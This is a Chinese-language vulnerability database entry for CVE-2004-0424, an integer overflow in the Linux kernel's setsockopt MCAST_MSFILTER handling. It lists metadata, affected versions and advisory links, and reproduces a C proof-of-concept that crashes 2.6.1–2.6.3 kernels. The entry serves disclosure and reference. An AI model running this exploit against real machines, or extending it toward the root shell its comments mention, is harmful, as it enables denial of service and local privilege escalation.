Linux Kernel Setsockopt MCAST_MSFILTER整数溢出漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1107894 漏洞类型 缓冲区溢出
发布时间 2004-04-21 更新时间 2007-05-25
CVE编号 CVE-2004-0424 CNNVD-ID CNNVD-200407-013
漏洞平台 Linux CVSS评分 7.2
|漏洞来源
https://www.exploit-db.com/exploits/274
https://www.securityfocus.com/bid/10179
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200407-013
|漏洞详情
Linuxkernel2.4.22到2.4.25和2.6.1到2.6.3版本的ip_setsockopt函数存在整数溢出漏洞。本地用户借助MCAST_MSFILTER接口选项导致服务拒绝(崩溃)或者执行任意代码。
|漏洞EXP
/* setsockopt proof of concept code by Julien TINNES (julien a.t cr0.org)
vulnerability found (as always by Paul Starzetz

This is only a lame POC which will crash the machine, no root shell here.
Maybe later, when everybody will have an updated box.

It should work on 2.6.1, 2.6.2 and 2.6.3 kernels.

Greets to Christophe Devine, too bad you wasn't with me for this one.

*/


#include <errno.h>
void perror (const char *s);

#include <sys/types.h>
#include <sys/socket.h>
#include <linux/in.h>
#include <linux/socket.h>

#define SOL_IP 0
#define MCAST_MSFILTER 48

/* mynumsrc and alloc_room control the overflow
* what we write can be controlled too (not needed
* here but needed for rootshell exploit
*/

#define mynumsrc 0x100 /* 0x100 should be enough, can be tweaked */
#define alloc_room 1 /* let it alocate only one u32 */

struct mygroup_filter
{
__u32 gf_interface; /* interface index */
struct sockaddr_storage gf_group; /* multicast address */
__u32 gf_fmode; /* filter mode */
__u32 gf_numsrc; /* number of sources */
struct sockaddr_storage gf_slist[mynumsrc]; /* interface index */
};


void
main (void)
{

int mysocket;
int sockprot;
struct mygroup_filter mygroup;
int optlen;
int i;
struct sockaddr_in *psin;

mygroup.gf_interface = 0;
mygroup.gf_numsrc = (1 << 30) - 4 + alloc_room;

mygroup.gf_group.ss_family = AF_INET;



for (i = 0; i < mynumsrc; i++)
{
psin = (struct sockaddr_in *) &mygroup.gf_slist[i];
psin->sin_family = AF_INET;
}


mysocket = socket (PF_INET, SOCK_STREAM, 0);

if (mysocket == -1)
{
perror ("Socket creation error: ");
exit (1);
}

optlen = sizeof (struct mygroup_filter);

printf ("Calling setsockopt(), this should crash the box...\n");
sockprot = setsockopt (mysocket, SOL_IP, MCAST_MSFILTER, &mygroup, optlen);

if (sockprot == -1)
{
perror ("Invalid setsockopt: ");
exit (1);
}
}




// milw0rm.com [2004-04-21]
|受影响的产品
Slackware Linux 9.1 Slackware Linux -current SGI ProPack 3.0 Linux kernel 2.6.3 Linux kernel 2.6.2 Linux kernel 2.6.1 -rc2 Linux kernel 2.6.1 -rc1
|参考资料

来源:XF
名称:linux-ipsetsockopt-integer-bo(15907)
链接:http://xforce.iss.net/xforce/xfdb/15907
来源:BID
名称:10179
链接:http://www.securityfocus.com/bid/10179
来源:ENGARDE
名称:ESA-20040428-004
链接:http://www.linuxsecurity.com/advisories/engarde_advisory-4285.html
来源:www.isec.pl
链接:http://www.isec.pl/vulnerabilities/isec-0015-msfilter.txt
来源:BUGTRAQ
名称:20040420LinuxkernelsetsockoptMCAST_MSFILTERintegeroverflow
链接:http://marc.theaimsgroup.com/?l=bugtraq&m=108253171301153&w=2
来源:SUSE
名称:SuSE-SA:2004:010
链接:http://www.novell.com/linux/security/advisories/2004_10_kernel.html
来源:OVAL
名称:oval:org.mitre.oval:def:11214
链接:http://oval.mitre.org/repository/data/getDef?id=oval:org.mitre.oval:def:11214
来源:SGI
名称:20040504-01-U
链接:ftp://patches.sgi.com/support/free/security/advisories/20040504-01-U.asc
来源:SLACKWARE
名称:SSA:2004-119
链接:http://www.slackware.com/security/viewer.php?l=slackware-security&y=2004&m=slackware-security.659586
来源:REDHAT
名称:RHSA-2004:183
链接:http://www.redhat.com/support/errata/RHSA-2004-183.ht